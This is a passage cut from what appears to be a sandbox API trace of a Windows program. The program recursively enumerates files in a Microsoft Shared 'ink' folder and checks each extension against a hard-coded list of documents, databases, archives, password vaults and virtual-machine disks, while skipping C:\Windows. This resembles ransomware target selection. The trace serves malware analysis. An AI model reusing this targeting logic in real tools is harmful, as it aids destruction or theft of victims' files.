pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll" [0039.963] PathFindExtensionW (pszPath="IpsPlugin.dll") returned=".dll" [0039.963] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.963] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.963] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.963] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsptb.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" [0039.963] PathFindExtensionW (pszPath="ipsptb.xml") returned=".xml" [0039.963] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.963] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.963] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.963] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsptg.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" [0039.963] PathFindExtensionW (pszPath="ipsptg.xml") returned=".xml" [0039.963] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.963] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.963] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.963] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsrom.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" [0039.963] PathFindExtensionW (pszPath="ipsrom.xml") returned=".xml" [0039.963] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.963] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.964] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.964] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipsrus.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" [0039.964] PathFindExtensionW (pszPath="ipsrus.xml") returned=".xml" [0039.964] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.964] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.964] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.964] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipssrb.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" [0039.964] PathFindExtensionW (pszPath="ipssrb.xml") returned=".xml" [0039.964] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.964] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.964] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.964] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipssrl.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" [0039.964] PathFindExtensionW (pszPath="ipssrl.xml") returned=".xml" [0039.964] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.964] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.964] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.964] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ipssve.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" [0039.965] PathFindExtensionW (pszPath="ipssve.xml") returned=".xml" [0039.965] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.965] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.965] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.965] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="it-IT" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT" [0039.965] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT") returned 0x0 [0039.965] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*" [0039.965] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.966] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.966] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.966] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" [0039.966] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.966] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.966] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.966] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.967] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.967] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.967] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ja-JP" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP" [0039.967] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP") returned 0x0 [0039.967] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*" [0039.967] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.968] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.968] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.968] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" [0039.968] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.968] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.968] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.968] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.968] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.968] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.968] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="journal.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" [0039.968] PathFindExtensionW (pszPath="journal.dll") returned=".dll" [0039.968] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.968] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.968] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.969] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ko-KR" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR" [0039.969] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned 0x0 [0039.969] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*" [0039.969] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.970] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.970] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.970] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui" [0039.970] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.970] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.970] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.970] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.970] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.970] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.970] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="lt-LT" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT" [0039.970] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned 0x0 [0039.971] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*" [0039.971] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0039.975] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.975] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.975] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui" [0039.975] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.975] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.975] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.975] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.975] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.975] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.975] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="lv-LV" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV" [0039.975] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned 0x0 [0039.975] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*" [0039.976] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0039.976] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.976] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.976] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui" [0039.976] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.976] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.976] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.976] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.976] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.977] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.977] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="micaut.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" [0039.977] PathFindExtensionW (pszPath="micaut.dll") returned=".dll" [0039.977] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.977] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.977] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.977] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="Microsoft.Ink.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll" [0039.977] PathFindExtensionW (pszPath="Microsoft.Ink.dll") returned=".dll" [0039.977] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.977] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.977] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.977] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="mip.exe" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe" [0039.977] PathFindExtensionW (pszPath="mip.exe") returned=".exe" [0039.977] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".exe.") returned 5 [0039.977] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0039.978] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.978] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="mraut.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" [0039.978] PathFindExtensionW (pszPath="mraut.dll") returned=".dll" [0039.978] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.978] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0039.978] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.978] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="mshwgst.dll" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll" [0039.978] PathFindExtensionW (pszPath="mshwgst.dll") returned=".dll" [0039.978] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0039.978] StrStrIW 